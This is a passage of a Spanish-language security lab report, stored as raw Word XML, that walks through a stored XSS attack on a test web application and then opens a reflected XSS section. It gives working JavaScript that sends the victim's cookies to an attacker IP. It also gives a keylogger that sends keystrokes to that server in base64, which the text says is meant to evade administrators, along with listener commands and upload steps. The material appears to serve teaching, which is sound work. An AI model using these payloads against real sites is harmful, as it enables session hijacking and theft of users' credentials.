      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AEC3CE" w14:textId="48DC1AC0" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">  fetch('http://192.168.1.148:433?key='+btoa(keysPressed.join("")));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9A8F87" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1080F1C8" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC840ED" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466F9193" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;textarea name="TextArea1" id="TextArea1" style="position:absolute;left:325px;top:160px;width:619px;height:203px;z-index:0;" rows="13" cols="75" spellcheck="false"&gt;&lt;/textarea&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41308733" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;div id="wb_Text1" style="position:absolute;left:445px;top:121px;width:246px;height:15px;z-index:1;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBF7E59" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;p&gt;Escriba el texto que va ser enviado&lt;/p&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365F1FD5" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;input type="submit" id="Button1" name="Enviar" value="Enviar" style="position:absolute;left:325px;top:403px;width:96px;height:25px;z-index:2;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A54FFD3" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A3053D" w14:textId="148A474E" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00A8657F">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE2146F" w14:textId="07F2EFD1" w:rsidR="008B68A9" w:rsidRDefault="00630D71" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo que hago aquí es enviar a un servidor remoto en la </w:t>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 192.168.1.148 y en el puerto 433, primero las cookies que la página tenga almacenadas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299B71FE" w14:textId="785C5AA3" w:rsidR="00630D71" w:rsidRPr="00290DA9" w:rsidRDefault="00630D71" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00290DA9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var i = new Image();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0E1AC6" w14:textId="5CB1B021" w:rsidR="00630D71" w:rsidRPr="00290DA9" w:rsidRDefault="00630D71" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00290DA9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i.src =</w:t>
      </w:r>
      <w:hyperlink r:id="rId180" w:history="1">
        <w:r w:rsidRPr="00290DA9">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://192.168.1.148?cooke=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00290DA9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> + document.cookie;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BED3A8" w14:textId="31D17187" w:rsidR="00630D71" w:rsidRDefault="00630D71" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Este código envía al servidor del atacante, las cookies que tengan que ver con esta página, y así poder hacer una suplantación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFD0423" w14:textId="6794801D" w:rsidR="00630D71" w:rsidRDefault="00630D71" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4703CABA" w14:textId="6F1975C8" w:rsidR="00630D71" w:rsidRDefault="00630D71" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Después lo que hago es hacer un keyloger, para guardar todas las teclas pulsadas por la </w:t>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:t>víctima</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en la página, si esto fuera una página de sesión podría capturar su usuario y su contraseña:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47537350" w14:textId="677B9F53" w:rsidR="00630D71" w:rsidRDefault="00630D71" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45F5F90B" w14:textId="77777777" w:rsidR="00630D71" w:rsidRPr="004C17EA" w:rsidRDefault="00630D71" w:rsidP="00630D71">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C17EA">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>let keysPressed = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634392CB" w14:textId="77777777" w:rsidR="00630D71" w:rsidRPr="004C17EA" w:rsidRDefault="00630D71" w:rsidP="00630D71">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C17EA">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document.onkeypress = function(e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A342EF" w14:textId="76EF2033" w:rsidR="00630D71" w:rsidRPr="004C17EA" w:rsidRDefault="00630D71" w:rsidP="00630D71">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C17EA">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  keysPressed.push(e.key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724BC75A" w14:textId="4D6F168B" w:rsidR="00630D71" w:rsidRPr="004C17EA" w:rsidRDefault="00630D71" w:rsidP="00630D71">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C17EA">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  fetch('http://192.168.1.148:433?key='+btoa(keysPressed.join(""));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441B9046" w14:textId="39C0B3C1" w:rsidR="00630D71" w:rsidRPr="004C17EA" w:rsidRDefault="00630D71" w:rsidP="00630D71">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C17EA">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BCC41D" w14:textId="54BC4D92" w:rsidR="00630D71" w:rsidRDefault="00630D71" w:rsidP="00630D71">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56F8CD5A" w14:textId="63F2E60C" w:rsidR="00630D71" w:rsidRDefault="00630D71" w:rsidP="00630D71">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora enseñaré el ejemplo de la explotación de la vulnerabilidad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7870376B" w14:textId="2A06751E" w:rsidR="00630D71" w:rsidRDefault="00630D71" w:rsidP="00630D71">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Primero en la máquina propiedad del atacante creo un servidor web en </w:t>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:t>, con el comando Python -m http.server 433, con esto creo un servidor web en la IP (192.168.1.148) del atacante, funcionando en el puerto 433, y así poder enviarle los datos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491326C2" w14:textId="7EC2B06C" w:rsidR="00630D71" w:rsidRDefault="00630D71" w:rsidP="00630D71">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DF7182C" w14:textId="5BD2B67C" w:rsidR="00630D71" w:rsidRDefault="00630D71" w:rsidP="00630D71">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00630D71">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11D85152" wp14:editId="429EA953">
            <wp:extent cx="5400040" cy="23285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2328545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAF8B03" w14:textId="77777777" w:rsidR="00630D71" w:rsidRPr="00630D71" w:rsidRDefault="00630D71" w:rsidP="00630D71">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C9C1623" w14:textId="136A7525" w:rsidR="00630D71" w:rsidRDefault="008C775F" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora vamos </w:t>
      </w:r>
      <w:r w:rsidR="004251E9">
        <w:t>a la página web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761CB6EC" w14:textId="0FBABB3B" w:rsidR="004251E9" w:rsidRDefault="00C57F5D" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Par hacer</w:t>
      </w:r>
      <w:r w:rsidR="004251E9">
        <w:t xml:space="preserve"> esta prueba </w:t>
      </w:r>
      <w:r w:rsidR="00382933">
        <w:t>voy a</w:t>
      </w:r>
      <w:r w:rsidR="004251E9">
        <w:t xml:space="preserve"> crear un usuario, con el nombre usuario y la contraseña usuario, para poder subir los archivos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8A660F" w14:textId="417A590A" w:rsidR="004251E9" w:rsidRDefault="004251E9" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB6BDC3" w14:textId="456F2731" w:rsidR="004251E9" w:rsidRDefault="004251E9" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora tendremos que ir a upload y subir el archivo, en mi caso se llama index.html:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543F531F" w14:textId="01207971" w:rsidR="004251E9" w:rsidRDefault="004251E9" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="004251E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A76CE52" wp14:editId="7137B4D0">
            <wp:extent cx="5400040" cy="58051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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DF8A7D" w14:textId="549C3846" w:rsidR="004251E9" w:rsidRDefault="004251E9" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="004251E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68DFA993" wp14:editId="4247EF59">
            <wp:extent cx="5400040" cy="58051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0040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0827C2C1" w14:textId="77777777" w:rsidR="001F06BE" w:rsidRDefault="001F06BE" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B5FDAC8" w14:textId="2BDFCB30" w:rsidR="004251E9" w:rsidRDefault="004251E9" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Una vez subido el archivo tendremos este enlace:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4382C555" w14:textId="33B3C190" w:rsidR="004251E9" w:rsidRDefault="004251E9" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="004251E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FC18855" wp14:editId="53E92EC3">
            <wp:extent cx="5400040" cy="346138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3461385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1215792C" w14:textId="787DB1FA" w:rsidR="004251E9" w:rsidRDefault="004251E9" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0921B2A5" w14:textId="61AE24CE" w:rsidR="004251E9" w:rsidRDefault="004251E9" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Si accedemos a este archivo se ejecutará el código malicioso:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D0C3CA" w14:textId="78671A1C" w:rsidR="002B311A" w:rsidRDefault="004251E9" w:rsidP="002B311A">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nada más abrir la página podremos comprobar </w:t>
      </w:r>
      <w:r w:rsidR="002B311A">
        <w:t>cómo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> se envían las cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2661A6A0" w14:textId="77777777" w:rsidR="001F06BE" w:rsidRDefault="001F06BE" w:rsidP="002B311A">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03A0C45F" w14:textId="0B4204BF" w:rsidR="004251E9" w:rsidRDefault="004251E9" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="004251E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19C4BED5" wp14:editId="3B12518E">
            <wp:extent cx="5400040" cy="29025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902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBCC4D6" w14:textId="77777777" w:rsidR="001F06BE" w:rsidRDefault="001F06BE" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EA24F68" w14:textId="026E113D" w:rsidR="002B311A" w:rsidRDefault="002B311A" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Para crear el servidor web en la maquina Kali, uso el comando ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>Python -m http.server 443</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’, también se podría hacer así </w:t>
      </w:r>
      <w:r w:rsidRPr="002B311A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>‘socat -v -v -d -d TCP-LISTEN:8080,reuseaddr,fork exec:"cat http.response",pipes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’, siendo http.response </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>un fichero que habría que crear y que contendría la página web que mostrará el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E04A3B" w14:textId="2AD84173" w:rsidR="00D20D12" w:rsidRDefault="00D20D12" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Este sería la creación de la cookie en el servidor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4553AE6C" w14:textId="77777777" w:rsidR="001F06BE" w:rsidRDefault="001F06BE" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B477FEB" w14:textId="36573050" w:rsidR="00D20D12" w:rsidRDefault="00D20D12" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79F4F39B" wp14:editId="65D76832">
            <wp:extent cx="5400040" cy="4609465"/>
            <wp:effectExtent l="0" t="0" r="0"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4609465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E5470D" w14:textId="77777777" w:rsidR="001F06BE" w:rsidRPr="00D20D12" w:rsidRDefault="001F06BE" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="201C2C9D" w14:textId="5884DE89" w:rsidR="004251E9" w:rsidRDefault="004251E9" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora comprobaremos el funcionamiento del keyloger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5A1A30" w14:textId="7BE39D54" w:rsidR="004251E9" w:rsidRDefault="007B6F1A" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="007B6F1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C53091A" wp14:editId="2703AB47">
            <wp:extent cx="5400040" cy="290258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00040" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66179706" w14:textId="77777777" w:rsidR="001F06BE" w:rsidRDefault="001F06BE" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="448BA45A" w14:textId="73A5B2D9" w:rsidR="004251E9" w:rsidRDefault="004251E9" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Como podremos comprobar se envían cada pulsación de una tecla</w:t>
      </w:r>
      <w:r w:rsidR="007B6F1A">
        <w:t>, que se va guardando en un array, en cada envió podremos ver todas las teclas pulsadas, las teclas están cifradas en base64 para evitar que un administrador detecte el tráfico.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5D4FED" w14:textId="188EA2F0" w:rsidR="002654D3" w:rsidRDefault="002654D3" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="330D7E72" w14:textId="05DDA4CA" w:rsidR="002654D3" w:rsidRDefault="002654D3" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51F3F41B" w14:textId="7386BF6C" w:rsidR="00630D71" w:rsidRPr="00630D71" w:rsidRDefault="00630D71" w:rsidP="00630D71">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004251E9">
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="146D71A1" w14:textId="70008479" w:rsidR="008B68A9" w:rsidRDefault="007B5192">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc128034161"/>
      <w:r>
        <w:t>XSS Reflejado -&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="5EE711A9" w14:textId="60C4D675" w:rsidR="007B5192" w:rsidRDefault="007B5192" w:rsidP="007B5192">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A643C70" w14:textId="337C59D3" w:rsidR="00A44A52" w:rsidRDefault="00A44A52" w:rsidP="00A44A52">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este ataque </w:t>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> documentado por OWASP Fundation: </w:t>
      </w:r>
      <w:hyperlink r:id="rId188" w:history="1">
        <w:r w:rsidRPr="00A44A52">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>enlace</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCAFD16" w14:textId="31C5169B" w:rsidR="00A44A52" w:rsidRDefault="00A44A52" w:rsidP="00A44A52">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este ataque surge cuando una aplicación recibe datos en una solicitud HTTP </w:t>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> incluye esos datos en la respuesta inmediata de una manera no segura, ejemplo;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314D9260" w14:textId="2E84B0AA" w:rsidR="00A44A52" w:rsidRDefault="00000000" w:rsidP="00A44A52">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:hyperlink r:id="rId189" w:history="1">
        <w:r w:rsidR="00A44A52" w:rsidRPr="0047476A">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://ejemplo.com/search?busqueda=&lt;script&gt;alert(i);&lt;/script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A44A52">
        <w:t>&gt;</w:t>
